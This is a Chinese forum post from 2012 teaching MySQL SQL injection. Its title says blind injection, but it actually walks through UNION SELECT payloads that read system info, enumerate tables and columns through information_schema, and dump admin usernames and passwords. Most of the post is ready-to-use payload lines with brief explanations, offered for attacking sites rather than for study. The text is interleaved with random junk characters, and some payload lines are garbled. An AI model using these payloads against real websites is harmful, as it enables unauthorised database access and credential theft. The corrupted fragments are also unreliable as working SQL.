本文介绍MYSQL盲注的一些语句和方法
3 e. X$ h- I4 m! S- m ?' h
: z/ r% u$ Y. m8 f3 ^1 p$ G学习盲注前先了解下 IFORMATION_SCHEMA 库
6 D% m5 N( O% p9 g) m/ u+ q
/ r" A' h6 O0 l$ BMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
* J. z) d$ a% t( ?7 v存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
. e- w7 W0 k& X4 I8 f1 i1.得到所有数据库名:
" m4 L+ N7 u4 `3 v|SCHEMATA ->存储数据库名的表
7 e% y# l: s# d|---字段:SCHEMA_NAME ->数据库名称7 F% Y# V! I* y
4 ^; i% l( x3 p( s+ M( y% |- ?|TABLES ->存储表名5 L1 P5 Z' {* K7 T* O$ E! \
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
3 |" u |; s* b|---字段:TABLE_NAME ->存储表的表名
/ y) |6 k3 h8 S) k
/ S$ Y: S+ I+ z Y|COLUMNS ->存储的字段名表
( e2 i; k3 l* _: Z|---字段:TABLE_SCHEMA ->该字段所属数据库名0 f. d9 m/ m ]4 m
|---字段:TABLE_NAME ->存储所属表的名称
. P+ O/ Z% x* g2 p% ~, A! K" I7 X" ?0 B
) k! F* N6 _0 V; A% \* n% c|---字段:COLUMN_NAME ->该字段的名称4 }; O8 }+ O, l' T1 E: l
9 s- c4 R, ?- h0 V Q5 {; }8 d
& ^4 G" P$ J& n/ }
; O T* ^: r Y% |: H: g###########################################################################
, M7 v$ N, f/ G
3 \3 U7 C6 W ?/ n( o$ f0x001 获取系统信息:3 \5 K5 Z9 y8 \5 P5 C7 |+ r3 m
q" y2 W6 q7 u. G r2 Z6 m, [
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
+ e9 c j& \2 e! J' P3 l
( S9 o. @- I# K# b( T/*. g* }1 |; l) X1 `! m! Z2 K
" F- m0 m3 h) A( ^, {' s8 n
@@global.version_compile_os 获取系统版本8 W1 O& W2 C3 d/ u/ X f6 q
* H: b2 x2 ], Q0 [2 I( b g@@datadir 数据库路径' B3 z S9 s4 \% D' v8 ?; O1 Y
database() 当前数据库名称
: }' G9 Y w8 C& W; ~0 p2 _0 }0x3c62723e 换行HEX值
# i$ g& p/ B% C3 {: D! a0 f4 H: _9 A& J/ h7 \. T! t5 Q7 p
*/
- v' [% ~; b6 f; e, B) t6 `
9 j4 E+ w, d) U6 k2 y! ]( J- N/ o
z J A/ [ V6 `/ P9 {8 M( z3 g% S" W4 U4 k0 k
######################################################################
. Z. O7 J- W/ ~
7 d2 n1 [% W/ z2 y( _# }0x002 获取表名) t" \7 y+ p% L' d
$ O, h( f2 R8 qunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*5 E+ \8 [! L5 ]8 L0 W7 A
$ i0 _* V! W% z [4 p
4 @- _1 P4 Q1 r/ `* g7 b- V* O. R& U) c4 |- a0 s
/*, A; ~ N6 B. A9 E
0 ?- c0 q) p( B0x67617264656e 为当前数据库名
6 Y" q a6 J$ s, t6 h7 m/ `) b6 V6 u: w2 a0 ]1 T' I# ^) x4 Z5 p! V
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
4 v' l$ S2 X+ j
0 r; P# b! a! c+ V2 X*/
" m# q* R0 F' t
. |) ^3 Z- C. @; v" w####################################################################### y' D: c1 r/ Z& B. ?2 F5 m
; d& `% l# k& N D7 c( |: c2 L 4 J9 W3 k/ r* Y- W7 m. v* Z
4 Y1 z! I3 M+ I% U4 S+ B! p0x003 获取字段, { l, D [! O
/ H C) y# v6 _& iunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*% `" I [) U/ Q* d7 ?/ q
% h3 h% a- ~1 Q4 q+ d) m/*0 A! D' w7 R' [' Q
: q, u- @5 I+ Y: b$ b
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
3 k, J6 b7 j+ C+ z+ N% g& l2 H# V& O! R
0x61646d696e ->选择一个表! a8 W! [+ L" M" N$ j
5 x2 [! j: ^! a, D& |$ J; g0 ~
0x67617264656e ->数据库名2 [% y5 p7 t6 y% s6 Z
# z/ m- A& e2 h) m: U
*/. ~/ E( l9 {1 Z4 C0 R
* \$ H' Y: [3 `/ B- L3 @4 i- q$ n#####################################################################
! H& r; I, @1 v+ {7 s3 o8 I# j5 i* B+ r! _, ]
6 u0 d6 I4 U( A, {* Y
; z0 {8 M! G; \% m5 J0x004 获取数据
- ~- J) e% I1 |5 t' f! h# `' u
# F. `5 g( |: C' Iunion select 1,2,34 u1 q1 D9 k+ q: {+ }! k1 I
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin1 R4 N5 m0 h+ g" t0 x. h2 [
" C& I" w9 m/ u2 B* i, \union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
Q4 D \# T, R
/ w% a/ t$ ?4 W0 e: h: F% b( t
# q% |; b# H, }; W: X- S U
+ ?) V: H$ D- M j+ C/*
5 p0 l! H5 X% j9 i1 S# {9 x* B7 }4 M* r$ c% y8 y: C; s
0x3c62723e 换行符号HEX编码1 S6 C: \" C7 S3 m1 s; A& U
& f3 X5 Q9 z6 C5 R3 m
group_concat 同时获得该字段所有数据
9 u8 C+ ~0 I5 \) n' I! u1 n) {6 F4 |2 A$ g( F: ~2 h
*/
8 L8 f# ]7 q# i/ z. U: Y* a0 T% s+ L
|
发表于 2012-9-13 17:48:44
收藏
支持
反对